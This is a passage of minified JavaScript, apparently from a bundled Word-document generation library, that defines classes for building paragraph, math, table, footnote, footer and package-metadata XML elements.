n0(`rId${Ce}`,nt,Dt,di);return this.addRelationship(pi),pi}get RelationshipCount(){return this.root.length-1}}class uo{constructor(Ce){this.document=new ic(Ce),this.relationships=new Hm}get View(){return this.document}get Relationships(){return this.relationships}}var Nc,n_,us;(function(Se){Se.NONE="none",Se.DROP="drop",Se.MARGIN="margin"})(Nc||(Nc={})),function(Se){Se.MARGIN="margin",Se.PAGE="page",Se.TEXT="text"}(n_||(n_={})),function(Se){Se.AROUND="around",Se.AUTO="auto",Se.NONE="none",Se.NOT_BESIDE="notBeside",Se.THROUGH="through",Se.TIGHT="tight"}(us||(us={}));class Is extends b{constructor(){super(...arguments),this.xmlKeys={anchorLock:"w:anchorLock",dropCap:"w:dropCap",width:"w:w",height:"w:h",x:"w:x",y:"w:y",anchorHorizontal:"w:hAnchor",anchorVertical:"w:vAnchor",spaceHorizontal:"w:hSpace",spaceVertical:"w:vSpace",rule:"w:hRule",alignmentX:"w:xAlign",alignmentY:"w:yAlign",lines:"w:lines",wrap:"w:wrap"}}}class Gu extends E{constructor(Ce){var nt,Dt;super("w:framePr"),this.root.push(new Is({anchorLock:Ce.anchorLock,dropCap:Ce.dropCap,width:Ce.width,height:Ce.height,x:Ce.position?Ce.position.x:void 0,y:Ce.position?Ce.position.y:void 0,anchorHorizontal:Ce.anchor.horizontal,anchorVertical:Ce.anchor.vertical,spaceHorizontal:null===(nt=Ce.space)||void 0===nt?void 0:nt.horizontal,spaceVertical:null===(Dt=Ce.space)||void 0===Dt?void 0:Dt.vertical,rule:Ce.rule,alignmentX:Ce.alignment?Ce.alignment.x:void 0,alignmentY:Ce.alignment?Ce.alignment.y:void 0,lines:Ce.lines,wrap:Ce.wrap}))}}class dl extends g{constructor(Ce){var nt,Dt;if(super("w:pPr"),this.numberingReferences=[],!Ce)return this;if(Ce.heading&&this.push(new vo(Ce.heading)),Ce.bullet&&this.push(new vo("ListParagraph")),Ce.numbering&&(Ce.style||Ce.heading||Ce.numbering.custom||this.push(new vo("ListParagraph"))),Ce.style&&this.push(new vo(Ce.style)),void 0!==Ce.keepNext&&this.push(new l("w:keepNext",Ce.keepNext)),void 0!==Ce.keepLines&&this.push(new l("w:keepLines",Ce.keepLines)),Ce.pageBreakBefore&&this.push(new V2),Ce.frame&&this.push(new Gu(Ce.frame)),void 0!==Ce.widowControl&&this.push(new l("w:widowControl",Ce.widowControl)),Ce.bullet&&this.push(new Xn(1,Ce.bullet.level)),Ce.numbering&&(this.numberingReferences.push({reference:Ce.numbering.reference,instance:null!==(nt=Ce.numbering.instance)&&void 0!==nt?nt:0}),this.push(new Xn(`${Ce.numbering.reference}-${null!==(Dt=Ce.numbering.instance)&&void 0!==Dt?Dt:0}`,Ce.numbering.level))),Ce.border&&this.push(new R(Ce.border)),Ce.thematicBreak&&this.push(new J),Ce.shading&&this.push(new me(Ce.shading)),Ce.rightTabStop&&this.push(new Zp(Kt.RIGHT,Ce.rightTabStop)),Ce.tabStops)for(const di of Ce.tabStops)this.push(new Zp(di.type,di.position,di.leader));Ce.leftTabStop&&this.push(new Zp(Kt.LEFT,Ce.leftTabStop)),void 0!==Ce.bidirectional&&this.push(new l("w:bidi",Ce.bidirectional)),Ce.spacing&&this.push(new dc(Ce.spacing)),Ce.indent&&this.push(new ue(Ce.indent)),void 0!==Ce.contextualSpacing&&this.push(new l("w:contextualSpacing",Ce.contextualSpacing)),Ce.alignment&&this.push(new X(Ce.alignment)),void 0!==Ce.outlineLevel&&this.push(new Uu(Ce.outlineLevel)),void 0!==Ce.suppressLineNumbers&&this.push(new l("w:suppressLineNumbers",Ce.suppressLineNumbers))}push(Ce){this.root.push(Ce)}prepForXml(Ce){if(Ce.viewWrapper instanceof uo)for(const nt of this.numberingReferences)Ce.file.Numbering.createConcreteNumberingInstance(nt.reference,nt.instance);return super.prepForXml(Ce)}}class uc extends E{constructor(Ce){if(super("w:p"),"string"==typeof Ce)return this.properties=new dl({}),this.root.push(this.properties),this.root.push(new vt(Ce)),this;if(this.properties=new dl(Ce),this.root.push(this.properties),Ce.text&&this.root.push(new vt(Ce.text)),Ce.children)for(const nt of Ce.children)if(nt instanceof i_){this.root.push(nt.start);for(const Dt of nt.children)this.root.push(Dt);this.root.push(nt.end)}else this.root.push(nt)}prepForXml(Ce){for(const nt of this.root)if(nt instanceof Wt){const Dt=this.root.indexOf(nt),di=new qd(nt.options.children,(0,ha.EL)());Ce.viewWrapper.Relationships.createRelationship(di.linkId,"http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink",nt.options.link,ti.EXTERNAL),this.root[Dt]=di}return super.prepForXml(Ce)}addRunToFront(Ce){return this.root.splice(1,0,Ce),this}}class gr extends E{constructor(Ce){super("m:oMath");for(const nt of Ce.children)this.root.push(nt)}}class s0 extends E{constructor(Ce){super("m:t"),this.root.push(Ce)}}class PM extends E{constructor(Ce){super("m:r"),this.root.push(new s0(Ce))}}class c0 extends E{constructor(Ce){super("m:den");for(const nt of Ce)this.root.push(nt)}}class ju extends E{constructor(Ce){super("m:num");for(const nt of Ce)this.root.push(nt)}}class OM extends E{constructor(Ce){super("m:f"),this.root.push(new ju(Ce.numerator)),this.root.push(new c0(Ce.denominator))}}class U2 extends b{constructor(){super(...arguments),this.xmlKeys={accent:"m:val"}}}class l0 extends E{constructor(Ce){super("m:chr"),this.root.push(new U2({accent:Ce}))}}class hc extends E{constructor(Ce){super("m:e");for(const nt of Ce)this.root.push(nt)}}class q2 extends b{constructor(){super(...arguments),this.xmlKeys={value:"m:val"}}}class d0 extends E{constructor(){super("m:limLoc"),this.root.push(new q2({value:"undOvr"}))}}class G2 extends b{constructor(){super(...arguments),this.xmlKeys={hide:"m:val"}}}class j2 extends E{constructor(){super("m:subHide"),this.root.push(new G2({hide:1}))}}class Q2 extends b{constructor(){super(...arguments),this.xmlKeys={hide:"m:val"}}}class NM extends E{constructor(){super("m:supHide"),this.root.push(new Q2({hide:1}))}}class Tf extends E{constructor(Ce,nt,Dt){super("m:naryPr"),this.root.push(new l0(Ce)),this.root.push(new d0),nt||this.root.push(new NM),Dt||this.root.push(new j2)}}class Ef extends E{constructor(Ce){super("m:sub");for(const nt of Ce)this.root.push(nt)}}class Df extends E{constructor(Ce){super("m:sup");for(const nt of Ce)this.root.push(nt)}}class m0 extends E{constructor(Ce){super("m:nary"),this.root.push(new Tf("\u2211",!!Ce.superScript,!!Ce.subScript)),Ce.subScript&&this.root.push(new Ef(Ce.subScript)),Ce.superScript&&this.root.push(new Df(Ce.superScript)),this.root.push(new hc(Ce.children))}}class o_ extends E{constructor(){super("m:sSupPr")}}class xf extends E{constructor(Ce){super("m:sSup"),this.root.push(new o_),this.root.push(new hc(Ce.children)),this.root.push(new Df(Ce.superScript))}}class $2 extends E{constructor(){super("m:sSubPr")}}class LM extends E{constructor(Ce){super("m:sSub"),this.root.push(new $2),this.root.push(new hc(Ce.children)),this.root.push(new Ef(Ce.subScript))}}class K2 extends E{constructor(){super("m:sSubSupPr")}}class Qd extends E{constructor(Ce){super("m:sSubSup"),this.root.push(new K2),this.root.push(new hc(Ce.children)),this.root.push(new Ef(Ce.subScript)),this.root.push(new Df(Ce.superScript))}}class u0 extends E{constructor(){super("m:sPrePr")}}class sa extends E{constructor(Ce){super("m:sPre"),this.root.push(new u0),this.root.push(new hc(Ce.children)),this.root.push(new Ef(Ce.subScript)),this.root.push(new Df(Ce.superScript))}}const h0="";class f0 extends E{constructor(Ce){if(super("m:deg"),Ce)for(const nt of Ce)this.root.push(nt)}}class wf extends b{constructor(){super(...arguments),this.xmlKeys={hide:"m:val"}}}class p0 extends E{constructor(){super("m:degHide"),this.root.push(new wf({hide:1}))}}class r_ extends E{constructor(Ce){super("m:radPr"),Ce||this.root.push(new p0)}}class X2 extends E{constructor(Ce){super("m:rad"),this.root.push(new r_(!!Ce.degree)),this.root.push(new f0(Ce.degree)),this.root.push(new hc(Ce.children))}}class If extends E{constructor(Ce){super("m:fName");for(const nt of Ce)this.root.push(nt)}}class Qu extends E{constructor(){super("m:funcPr")}}class fc extends E{constructor(Ce){super("m:func"),this.root.push(new Qu),this.root.push(new If(Ce.name)),this.root.push(new hc(Ce.children))}}class s_ extends b{constructor(){super(...arguments),this.xmlKeys={character:"m:val"}}}class Y2 extends E{constructor(Ce){super("m:begChr"),this.root.push(new s_({character:Ce}))}}class c_ extends b{constructor(){super(...arguments),this.xmlKeys={character:"m:val"}}}class Rf extends E{constructor(Ce){super("m:endChr"),this.root.push(new c_({character:Ce}))}}class l_ extends E{constructor(Ce){super("m:dPr"),Ce&&(this.root.push(new Y2(Ce.beginningCharacter)),this.root.push(new Rf(Ce.endingCharacter)))}}class Ar extends E{constructor(Ce){super("m:d"),this.root.push(new l_),this.root.push(new hc(Ce.children))}}class J2 extends E{constructor(Ce){super("m:d"),this.root.push(new l_({beginningCharacter:"[",endingCharacter:"]"})),this.root.push(new hc(Ce.children))}}class zM extends E{constructor(Ce){super("m:d"),this.root.push(new l_({beginningCharacter:"{",endingCharacter:"}"})),this.root.push(new hc(Ce.children))}}class $d extends E{constructor(Ce){super("m:d"),this.root.push(new l_({beginningCharacter:"\u2329",endingCharacter:"\u232a"})),this.root.push(new hc(Ce.children))}}class pc extends E{constructor(Ce){super("w:tblGrid");for(const nt of Ce)this.root.push(new d_(nt))}}class Z2 extends b{constructor(){super(...arguments),this.xmlKeys={w:"w:w"}}}class d_ extends E{constructor(Ce){super("w:gridCol"),void 0!==Ce&&this.root.push(new Z2({w:(0,z.Jd)(Ce)}))}}var Lc,hs,$u,Um;!function(Se){Se.AUTO="auto",Se.DXA="dxa",Se.NIL="nil",Se.PERCENTAGE="pct"}(Lc||(Lc={}));class eC extends b{constructor(){super(...arguments),this.xmlKeys={type:"w:type",size:"w:w"}}}class Rs extends E{constructor(Ce,{type:nt=Lc.AUTO,size:Dt}){super(Ce);let di=Dt;nt===Lc.PERCENTAGE&&"number"==typeof Dt&&(di=`${Dt}%`),this.root.push(new eC({type:nt,size:(0,z.aB)(di)}))}}!function(Se){Se.TABLE="w:tblCellMar",Se.TABLE_CELL="w:tcMar"}(hs||(hs={}));class m_ extends g{constructor(Ce,{marginUnitType:nt=Lc.DXA,top:Dt,left:di,bottom:pi,right:Hi}){super(Ce),void 0!==Dt&&this.root.push(new Rs("w:top",{type:nt,size:Dt})),void 0!==di&&this.root.push(new Rs("w:left",{type:nt,size:di})),void 0!==pi&&this.root.push(new Rs("w:bottom",{type:nt,size:pi})),void 0!==Hi&&this.root.push(new Rs("w:right",{type:nt,size:Hi}))}}class sd extends g{constructor(Ce){super("w:tcBorders"),Ce.top&&this.root.push(new L("w:top",Ce.top)),Ce.start&&this.root.push(new L("w:start",Ce.start)),Ce.left&&this.root.push(new L("w:left",Ce.left)),Ce.bottom&&this.root.push(new L("w:bottom",Ce.bottom)),Ce.end&&this.root.push(new L("w:end",Ce.end)),Ce.right&&this.root.push(new L("w:right",Ce.right))}}class Ua extends b{constructor(){super(...arguments),this.xmlKeys={val:"w:val"}}}class u_ extends E{constructor(Ce){super("w:gridSpan"),this.root.push(new Ua({val:(0,z.vH)(Ce)}))}}!function(Se){Se.CONTINUE="continue",Se.RESTART="restart"}($u||($u={}));class tC extends b{constructor(){super(...arguments),this.xmlKeys={val:"w:val"}}}class h_ extends E{constructor(Ce){super("w:vMerge"),this.root.push(new tC({val:Ce}))}}!function(Se){Se.BOTTOM_TO_TOP_LEFT_TO_RIGHT="btLr",Se.LEFT_TO_RIGHT_TOP_TO_BOTTOM="lrTb",Se.TOP_TO_BOTTOM_RIGHT_TO_LEFT="tbRl"}(Um||(Um={}));class iC extends b{constructor(){super(...arguments),this.xmlKeys={val:"w:val"}}}class Sf extends E{constructor(Ce){super("w:textDirection"),this.root.push(new iC({val:Ce}))}}class Ku extends g{constructor(Ce){super("w:tcPr"),Ce.width&&this.root.push(new Rs("w:tcW",Ce.width)),Ce.columnSpan&&this.root.push(new u_(Ce.columnSpan)),Ce.verticalMerge?this.root.push(new h_(Ce.verticalMerge)):Ce.rowSpan&&Ce.rowSpan>1&&this.root.push(new h_($u.RESTART)),Ce.borders&&this.root.push(new sd(Ce.borders)),Ce.shading&&this.root.push(new me(Ce.shading)),Ce.margins&&this.root.push(new m_(hs.TABLE_CELL,Ce.margins)),Ce.textDirection&&this.root.push(new Sf(Ce.textDirection)),Ce.verticalAlign&&this.root.push(new ur(Ce.verticalAlign))}}class f_ extends E{constructor(Ce){super("w:tc"),this.options=Ce,this.root.push(new Ku(Ce));for(const nt of Ce.children)this.root.push(nt)}prepForXml(Ce){return this.root[this.root.length-1]instanceof uc||this.root.push(new uc({})),super.prepForXml(Ce)}}const qm={style:U.NONE,size:0,color:"auto"},bi={style:U.SINGLE,size:4,color:"auto"};class Rn extends E{constructor(Ce){super("w:tblBorders"),this.root.push(new L("w:top",Ce.top?Ce.top:bi)),this.root.push(new L("w:left",Ce.left?Ce.left:bi)),this.root.push(new L("w:bottom",Ce.bottom?Ce.bottom:bi)),this.root.push(new L("w:right",Ce.right?Ce.right:bi)),this.root.push(new L("w:insideH",Ce.insideHorizontal?Ce.insideHorizontal:bi)),this.root.push(new L("w:insideV",Ce.insideVertical?Ce.insideVertical:bi))}}var be,kf,Kd,_c,Xu,Yu,p_;Rn.NONE={top:qm,bottom:qm,left:qm,right:qm,insideHorizontal:qm,insideVertical:qm},function(Se){Se.NEVER="never",Se.OVERLAP="overlap"}(be||(be={}));class Me extends b{constructor(){super(...arguments),this.xmlKeys={val:"w:val"}}}class or extends E{constructor(Ce){super("w:tblOverlap"),this.root.push(new Me({val:Ce}))}}(function(Se){Se.MARGIN="margin",Se.PAGE="page",Se.TEXT="text"})(kf||(kf={})),function(Se){Se.CENTER="center",Se.INSIDE="inside",Se.LEFT="left",Se.OUTSIDE="outside",Se.RIGHT="right"}(Kd||(Kd={})),function(Se){Se.CENTER="center",Se.INSIDE="inside",Se.BOTTOM="bottom",Se.OUTSIDE="outside",Se.INLINE="inline",Se.TOP="top"}(_c||(_c={}));class _0 extends b{constructor(){super(...arguments),this.xmlKeys={horizontalAnchor:"w:horzAnchor",verticalAnchor:"w:vertAnchor",absoluteHorizontalPosition:"w:tblpX",relativeHorizontalPosition:"w:tblpXSpec",absoluteVerticalPosition:"w:tblpY",relativeVerticalPosition:"w:tblpYSpec",bottomFromText:"w:bottomFromText",topFromText:"w:topFromText",leftFromText:"w:leftFromText",rightFromText:"w:rightFromText"}}}class aC extends E{constructor(Ce){var{leftFromText:nt,rightFromText:Dt,topFromText:di,bottomFromText:pi,absoluteHorizontalPosition:Hi,absoluteVerticalPosition:_a}=Ce,Ya=function(ca,ka){var Dr={};for(var Ao in ca)Object.prototype.hasOwnProperty.call(ca,Ao)&&ka.indexOf(Ao)<0&&(Dr[Ao]=ca[Ao]);if(null!=ca&&"function"==typeof Object.getOwnPropertySymbols){var sr=0;for(Ao=Object.getOwnPropertySymbols(ca);sr<Ao.length;sr++)ka.indexOf(Ao[sr])<0&&Object.prototype.propertyIsEnumerable.call(ca,Ao[sr])&&(Dr[Ao[sr]]=ca[Ao[sr]])}return Dr}(Ce,["leftFromText","rightFromText","topFromText","bottomFromText","absoluteHorizontalPosition","absoluteVerticalPosition"]);super("w:tblpPr"),this.root.push(new _0(Object.assign({leftFromText:void 0===nt?void 0:(0,z.Jd)(nt),rightFromText:void 0===Dt?void 0:(0,z.Jd)(Dt),topFromText:void 0===di?void 0:(0,z.Jd)(di),bottomFromText:void 0===pi?void 0:(0,z.Jd)(pi),absoluteHorizontalPosition:void 0===Hi?void 0:(0,z.xb)(Hi),absoluteVerticalPosition:void 0===_a?void 0:(0,z.xb)(_a)},Ya))),Ya.overlap&&this.root.push(new or(Ya.overlap))}}!function(Se){Se.AUTOFIT="autofit",Se.FIXED="fixed"}(Xu||(Xu={}));class g0 extends b{constructor(){super(...arguments),this.xmlKeys={type:"w:type"}}}class fs extends E{constructor(Ce){super("w:tblLayout"),this.root.push(new g0({type:Ce}))}}class ml extends g{constructor(Ce){super("w:tblPr"),Ce.style&&this.root.push(new A("w:tblStyle",Ce.style)),Ce.float&&this.root.push(new aC(Ce.float)),void 0!==Ce.visuallyRightToLeft&&this.root.push(new l("w:bidiVisual",Ce.visuallyRightToLeft)),Ce.width&&this.root.push(new Rs("w:tblW",Ce.width)),Ce.alignment&&this.root.push(new X(Ce.alignment)),Ce.indent&&this.root.push(new Rs("w:tblInd",Ce.indent)),Ce.borders&&this.root.push(new Rn(Ce.borders)),Ce.shading&&this.root.push(new me(Ce.shading)),Ce.layout&&this.root.push(new fs(Ce.layout)),Ce.cellMargin&&this.root.push(new m_(hs.TABLE,Ce.cellMargin))}}class C0 extends E{constructor({rows:Ce,width:nt,columnWidths:Dt=Array(Math.max(...Ce.map(Ao=>Ao.CellCount))).fill(100),margins:di,indent:pi,float:Hi,layout:_a,style:Ya,borders:ca,alignment:ka,visuallyRightToLeft:Dr}){super("w:tbl"),this.root.push(new ml({borders:null!=ca?ca:{},width:null!=nt?nt:{size:100},indent:pi,float:Hi,layout:_a,style:Ya,alignment:ka,cellMargin:di,visuallyRightToLeft:Dr})),this.root.push(new pc(Dt));for(const Ao of Ce)this.root.push(Ao);Ce.forEach((Ao,sr)=>{if(sr===Ce.length-1)return;let Fc=0;Ao.cells.forEach(At=>{if(At.options.rowSpan&&At.options.rowSpan>1){const gc=new f_({rowSpan:At.options.rowSpan-1,columnSpan:At.options.columnSpan,borders:At.options.borders,children:[],verticalMerge:$u.CONTINUE});Ce[sr+1].addCellToColumnIndex(gc,Fc)}Fc+=At.options.columnSpan||1})})}}!function(Se){Se.AUTO="auto",Se.ATLEAST="atLeast",Se.EXACT="exact"}(Yu||(Yu={}));class cd extends b{constructor(){super(...arguments),this.xmlKeys={value:"w:val",rule:"w:hRule"}}}class ul extends E{constructor(Ce,nt){super("w:trHeight"),this.root.push(new cd({value:(0,z.Jd)(Ce),rule:nt}))}}class y0 extends g{constructor(Ce){super("w:trPr"),void 0!==Ce.cantSplit&&this.root.push(new l("w:cantSplit",Ce.cantSplit)),void 0!==Ce.tableHeader&&this.root.push(new l("w:tblHeader",Ce.tableHeader)),Ce.height&&this.root.push(new ul(Ce.height.value,Ce.height.rule))}}class b0 extends E{constructor(Ce){super("w:tr"),this.options=Ce,this.root.push(new y0(Ce));for(const nt of Ce.children)this.root.push(nt)}get CellCount(){return this.options.children.length}get cells(){return this.root.filter(Ce=>Ce instanceof f_)}addCellToIndex(Ce,nt){this.root.splice(nt+1,0,Ce)}addCellToColumnIndex(Ce,nt){const Dt=this.columnIndexToRootIndex(nt,!0);this.addCellToIndex(Ce,Dt-1)}rootIndexToColumnIndex(Ce){if(Ce<1||Ce>=this.root.length)throw new Error("cell 'rootIndex' should between 1 to "+(this.root.length-1));let nt=0;for(let Dt=1;Dt<Ce;Dt++)nt+=this.root[Dt].options.columnSpan||1;return nt}columnIndexToRootIndex(Ce,nt=!1){if(Ce<0)throw new Error("cell 'columnIndex' should not less than zero");let Dt=0,di=1;for(;Dt<=Ce;){if(di>=this.root.length){if(nt)return this.root.length;throw new Error("cell 'columnIndex' should not great than "+(Dt-1))}const pi=this.root[di];di+=1,Dt+=pi&&pi.options.columnSpan||1}return di-1}}class Gm extends b{constructor(){super(...arguments),this.xmlKeys={xmlns:"xmlns",vt:"xmlns:vt"}}}class nC extends E{constructor(){super("Properties"),this.root.push(new Gm({xmlns:"http://schemas.openxmlformats.org/officeDocument/2006/extended-properties",vt:"http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"}))}}class __ extends b{constructor(){super(...arguments),this.xmlKeys={xmlns:"xmlns"}}}class Pf extends b{constructor(){super(...arguments),this.xmlKeys={contentType:"ContentType",extension:"Extension"}}}class ld extends E{constructor(Ce,nt){super("Default"),this.root.push(new Pf({contentType:Ce,extension:nt}))}}class g_ extends b{constructor(){super(...arguments),this.xmlKeys={contentType:"ContentType",partName:"PartName"}}}class zc extends E{constructor(Ce,nt){super("Override"),this.root.push(new g_({contentType:Ce,partName:nt}))}}class M0 extends E{constructor(){super("Types"),this.root.push(new __({xmlns:"http://schemas.openxmlformats.org/package/2006/content-types"})),this.root.push(new ld("image/png","png")),this.root.push(new ld("image/jpeg","jpeg")),this.root.push(new ld("image/jpeg","jpg")),this.root.push(new ld("image/bmp","bmp")),this.root.push(new ld("image/gif","gif")),this.root.push(new ld("application/vnd.openxmlformats-package.relationships+xml","rels")),this.root.push(new ld("application/xml","xml")),this.root.push(new zc("application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml","/word/document.xml")),this.root.push(new zc("application/vnd.openxmlformats-officedocument.wordprocessingml.styles+xml","/word/styles.xml")),this.root.push(new zc("application/vnd.openxmlformats-package.core-properties+xml","/docProps/core.xml")),this.root.push(new zc("application/vnd.openxmlformats-officedocument.custom-properties+xml","/docProps/custom.xml")),this.root.push(new zc("application/vnd.openxmlformats-officedocument.extended-properties+xml","/docProps/app.xml")),this.root.push(new zc("application/vnd.openxmlformats-officedocument.wordprocessingml.numbering+xml","/word/numbering.xml")),this.root.push(new zc("application/vnd.openxmlformats-officedocument.wordprocessingml.footnotes+xml","/word/footnotes.xml")),this.root.push(new zc("application/vnd.openxmlformats-officedocument.wordprocessingml.settings+xml","/word/settings.xml")),this.root.push(new zc("application/vnd.openxmlformats-officedocument.wordprocessingml.comments+xml","/word/comments.xml"))}addFooter(Ce){this.root.push(new zc("application/vnd.openxmlformats-officedocument.wordprocessingml.footer+xml",`/word/footer${Ce}.xml`))}addHeader(Ce){this.root.push(new zc("application/vnd.openxmlformats-officedocument.wordprocessingml.header+xml",`/word/header${Ce}.xml`))}}class C_ extends E{constructor(Ce){super("cp:coreProperties"),this.root.push(new ko({cp:"http://schemas.openxmlformats.org/package/2006/metadata/core-properties",dc:"http://purl.org/dc/elements/1.1/",dcterms:"http://purl.org/dc/terms/",dcmitype:"http://purl.org/dc/dcmitype/",xsi:"http://www.w3.org/2001/XMLSchema-instance"})),Ce.title&&this.root.push(new P("dc:title",Ce.title)),Ce.subject&&this.root.push(new P("dc:subject",Ce.subject)),Ce.creator&&this.root.push(new P("dc:creator",Ce.creator)),Ce.keywords&&this.root.push(new P("cp:keywords",Ce.keywords)),Ce.description&&this.root.push(new P("dc:description",Ce.description)),Ce.lastModifiedBy&&this.root.push(new P("cp:lastModifiedBy",Ce.lastModifiedBy)),Ce.revision&&this.root.push(new P("cp:revision",String(Ce.revision))),this.root.push(new y_("dcterms:created")),this.root.push(new y_("dcterms:modified"))}}class y_ extends E{constructor(Ce){super(Ce),this.root.push(new ko({type:"dcterms:W3CDTF"})),this.root.push((0,z.sF)(new Date))}}class v0 extends b{constructor(){super(...arguments),this.xmlKeys={xmlns:"xmlns",vt:"xmlns:vt"}}}class A0 extends b{constructor(){super(...arguments),this.xmlKeys={fmtid:"fmtid",pid:"pid",name:"name"}}}class Tr extends E{constructor(Ce,nt){super("property"),this.root.push(new A0({fmtid:"{D5CDD505-2E9C-101B-9397-08002B2CF9AE}",pid:Ce.toString(),name:nt.name})),this.root.push(new b_(nt.value))}}class b_ extends E{constructor(Ce){super("vt:lpwstr"),this.root.push(Ce)}}class oC extends E{constructor(Ce){super("Properties"),this.properties=[],this.root.push(new v0({xmlns:"http://schemas.openxmlformats.org/officeDocument/2006/custom-properties",vt:"http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"})),this.nextId=2;for(const nt of Ce)this.addCustomProperty(nt)}prepForXml(Ce){return this.properties.forEach(nt=>this.root.push(nt)),super.prepForXml(Ce)}addCustomProperty(Ce){this.properties.push(new Tr(this.nextId++,Ce))}}class rC extends b{constructor(){super(...arguments),this.xmlKeys={wpc:"xmlns:wpc",mc:"xmlns:mc",o:"xmlns:o",r:"xmlns:r",m:"xmlns:m",v:"xmlns:v",wp14:"xmlns:wp14",wp:"xmlns:wp",w10:"xmlns:w10",w:"xmlns:w",w14:"xmlns:w14",w15:"xmlns:w15",wpg:"xmlns:wpg",wpi:"xmlns:wpi",wne:"xmlns:wne",wps:"xmlns:wps",cp:"xmlns:cp",dc:"xmlns:dc",dcterms:"xmlns:dcterms",dcmitype:"xmlns:dcmitype",xsi:"xmlns:xsi",type:"xsi:type"}}}class Ss extends S{constructor(Ce,nt){super("w:ftr",nt),this.refId=Ce,nt||this.root.push(new rC({wpc:"http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas",mc:"http://schemas.openxmlformats.org/markup-compatibility/2006",o:"urn:schemas-microsoft-com:office:office",r:"http://schemas.openxmlformats.org/officeDocument/2006/relationships",m:"http://schemas.openxmlformats.org/officeDocument/2006/math",v:"urn:schemas-microsoft-com:vml",wp14:"http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing",wp:"http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing",w10:"urn:schemas-microsoft-com:office:word",w:"http://schemas.openxmlformats.org/wordprocessingml/2006/main",w14:"http://schemas.microsoft.com/office/word/2010/wordml",w15:"http://schemas.microsoft.com/office/word/2012/wordml",wpg:"http://schemas.microsoft.com/office/word/2010/wordprocessingGroup",wpi:"http://schemas.microsoft.com/office/word/2010/wordprocessingInk",wne:"http://schemas.microsoft.com/office/word/2006/wordml",wps:"http://schemas.microsoft.com/office/word/2010/wordprocessingShape"}))}get ReferenceId(){return this.refId}add(Ce){this.root.push(Ce)}}class hl{constructor(Ce,nt,Dt){this.media=Ce,this.footer=new Ss(nt,Dt),this.relationships=new Hm}add(Ce){this.footer.add(Ce)}addChildElement(Ce){this.footer.addChildElement(Ce)}get View(){return this.footer}get Relationships(){return this.relationships}get Media(){return this.media}}class rr extends b{constructor(){super(...arguments),this.xmlKeys={type:"w:type",id:"w:id"}}}class fi extends E{constructor(){super("w:footnoteRef")}}class sC extends pt{constructor(){super({style:"FootnoteReference"}),this.root.push(new fi)}}!function(Se){Se.SEPERATOR="separator",Se.CONTINUATION_SEPERATOR="continuationSeparator"}(p_||(p_={}));class ln extends E{constructor(Ce){super("w:footnote"),this.root.push(new rr({type:Ce.type,id:Ce.id}));for(let nt=0;nt<Ce.children.length;nt++){const Dt=Ce.children[nt];0===nt&&Dt.addRunToFront(new sC),this.root.push(Dt)}}}class cC extends E{constructor(){super("w:continuationSeparator")}}class lC extends pt{constructor(){super({}),this.root.push(new cC)}}class dC extends E{constructor(){super("w:separator")}}class Ju extends pt{constructor(){super({}),this.root.push(new dC)}}class ji extends b{constructor(){super(...arguments),this.xmlKeys={wpc:"xmlns:wpc",mc:"xmlns:mc",o:"xmlns:o",r:"xmlns:r",m:"xmlns:m",v:"xmlns:v",wp14:"xmlns:wp14",wp:"xmlns:wp",w10:"xmlns:w10",w:"xmlns:w",w14:"xmlns:w14",w15:"xmlns:w15",wpg:"xmlns:wpg",wpi:"xmlns:wpi",wne:"xmlns:wne",wps:"xmlns:wps",Ignorable:"mc:Ignorable"}}}class Zu extends E{constructor(){super("w:footnotes"),this.root.push(new ji({wpc:"http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas",mc:"http://schemas.openxmlformats.org/markup-compatibility/2006",o:"urn:schemas-microsoft-com:office:office",r:"http://schemas.openxmlformats.org/officeDocument/2006/relationships",m:"http://schemas.openxmlformats.org/officeDocument/2006/math",v:"urn:schemas-microsoft-com:vml",wp14:"http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing",wp:"http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing",w10:"urn:schemas-microsoft-com:office:word",w:"http://schemas.openxmlformats.org/wordprocessingml/2006/main",w14:"http://schemas.microsoft.com/office/word/2010/wordml",w15:"http://schemas.microsoft.com/office/word/2012/wordml",wpg:"http://schemas.microsoft.com/office/word/2010/wordprocessingGroup",wpi:"http://schemas.microsoft.com/office/word/2010/wordprocessingInk",wne:"http://schemas.microsoft.com/office/word/2006/wordml",wps:"http://schemas.microsoft.com/office/word/2010/wordprocessingShape",Ignorable:"w14 w15 wp14"}));const Ce=new ln({id:-1,type:p_.SEPERATOR,children:[new uc({spacing:{after:0,line:240,lineRule:qt.AUTO},children:[new Ju]})]});this.root.push(Ce);const nt=new ln({id:0,type:p_.CONTINUATION_SEPERATOR,children:[new uc({spacing:{after:0,line:240,lineRule:qt.AUTO},children:[new lC]})]});this.root.push(nt)}createFootNote(Ce,nt){const Dt=new ln({id:Ce,children:nt});this.root.push(Dt)}}class M_{constructor(){this.footnotess=new Zu,this.relationships=new Hm}get View(){return this.footnotess}get Relationships(){return this.relationships}}class Of extends b{constructor(){super(...arguments),this.xmlKeys={wpc:"xmlns:wpc",mc:"xmlns:mc",o:"xmlns:o",r:"xmlns:r",m:"xmlns:m",v:"xmlns:v",wp14:"xmlns:wp14",wp:"xmlns:wp",w10:"xmlns:w10",w:"xmlns:w",w14:"xmlns:w14",w15:"xmlns:w15",wpg:"xmlns:wpg",wpi:"xmlns:wpi",wne:"xmlns:wne",wps:"xmlns:wps",cp:"xmlns:cp",dc:"xmlns:dc",dcterms:"xmlns:dcterms",dcmitype:"xmlns:dcmitype",xsi:"xmlns:xsi",type:"xsi:type",cx:"xmlns:cx",cx1:"xmlns:cx1",cx2:"xmlns:cx2",cx3:"xmlns:cx3",cx4:"xmlns:cx4",cx5:"xmlns:cx5",cx6:"xmlns:cx6",cx7:"xmlns:cx7",cx8:"xmlns:cx8",w16cid:"xmlns:w16cid",w16se:"xmlns:w16se"}}}class fl extends S{constructor(Ce,nt){super("w:hdr",nt),this.refId=Ce,nt||this.root.push(new 